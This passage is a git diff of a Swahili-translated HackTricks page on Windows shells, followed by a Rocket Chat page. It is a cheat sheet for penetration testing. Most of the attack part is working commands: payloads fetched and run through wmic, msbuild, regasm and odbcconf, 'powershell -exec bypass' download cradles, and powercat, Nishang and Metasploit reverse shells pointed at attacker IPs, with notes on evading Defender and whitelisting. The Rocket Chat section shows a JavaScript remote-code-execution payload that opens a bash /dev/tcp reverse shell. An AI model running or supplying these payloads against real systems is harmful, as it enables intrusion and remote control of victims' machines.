hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +wmic os get /format:"https://webserver/payload.xsl" +``` +Mfano wa faili ya xsl [kutoka hapa](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): +```xml + + + + + + + +``` +**Haikutambuliwa** + +**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager wmic** + +## Msbuild + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +``` +cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" +``` +Unaweza kutumia mbinu hii kupita Application Whitelisting na vizuizi vya Powershell.exe. Kama utavyoonyeshwa na PS shell.\ +Pakua hii na uifanye: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) +``` +C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj +``` +**Haikutambuliwa** + +## **CSC** + +Kusanya msimbo wa C# kwenye mashine ya mwathirika. +``` +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs +``` +You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) + +**Haijatambuliwa** + +## **Regasm/Regsvc** + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll +``` +**Sijajaribu** + +[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) + +## Odbcconf + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} +``` +**Sijajaribu** + +[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) + +## Powershell Shells + +### PS-Nishang + +[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) + +Katika folda ya **Shells**, kuna shell nyingi tofauti. Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_, fanya nakala ya script na ongeza mwishoni mwa faili: +``` +Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 +``` +Anza kuhudumia skripti kwenye seva ya wavuti na uitekeleze upande wa mwathirika: +``` +powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" +``` +Defender haitambui kama msimbo mbaya (bado, 3/04/2019). + +**TODO: Angalia nishang shells nyingine** + +### **PS-Powercat** + +[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) + +Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na uite kwenye upande wa mwathirika: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +Defender haitambui kama msimbo mbaya (bado, 3/04/2019). + +**Chaguzi nyingine zinazotolewa na powercat:** + +Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... +``` +Serve a cmd Shell: +powercat -l -p 443 -e cmd +Send a cmd Shell: +powercat -c 10.1.1.1 -p 443 -e cmd +Send a powershell: +powercat -c 10.1.1.1 -p 443 -ep +Send a powershell UDP: +powercat -c 10.1.1.1 -p 443 -ep -u +TCP Listener to TCP Client Relay: +powercat -l -p 8000 -r tcp:10.1.1.16:443 +Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: +powercat -c 10.1.1.15 -p 443 -e cmd -g +Start A Persistent Server That Serves a File: +powercat -l -p 443 -i C:\inputfile -rep +``` +### Empire + +[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) + +Unda launcher ya powershell, ihifadhi kwenye faili na uipakue na kuitekeleze. +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +**Imegundulika kama msimbo mbaya** + +### MSF-Unicorn + +[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) + +Unda toleo la powershell la backdoor ya metasploit ukitumia unicorn +``` +python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 +``` +Anza msfconsole na rasilimali iliyoundwa: +``` +msfconsole -r unicorn.rc +``` +Anza seva ya wavuti inayotoa faili _powershell\_attack.txt_ na uendeleze katika mwathiriwa: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" +``` +**Imepatikana kama msimbo mbaya** + +## Zaidi + +[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console yenye baadhi ya moduli za PS za kushambulia zilizopakiwa (cyphered)\ +[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ +WinPWN](https://github.com/SecureThisShit/WinPwn) PS console yenye baadhi ya moduli za PS za kushambulia na ugunduzi wa proxy (IEX) + +## Marejeleo + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) +* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) +* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) +* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) +* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +​ +**Jaribu Kikundi cha Usalama wa Juu** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Jifunze & fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze & fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 9db636035..68e5ddfbc 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -1,8 +1,8 @@ # Rocket Chat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -14,7 +14,6 @@ Learn & practice GCP Hacking: {% endhint %} -{% endhint %}
@@ -29,7 +28,7 @@ Ikiwa wewe ni admin ndani ya Rocket Chat unaweza kupata RCE.
-* Kulingana na [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), zote zinatumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) kuchakata data. Hivyo hebu tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) kama: +* Kulingana na [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), zote zinatumia ES2015 / ECMAScript 6 ([kimsingi JavaScript](https://codeburst.io/javascript-wtf-is-es6-es-2017-ecmascript-dca859e4821c)) kusindika data. Hivyo hebu tupate [rev shell kwa javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) kama: ```javascript const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); @@ -53,9 +52,10 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
{% embed url="https://websec.nl/" %} + {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -63,9 +63,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} -
-{% endhint %}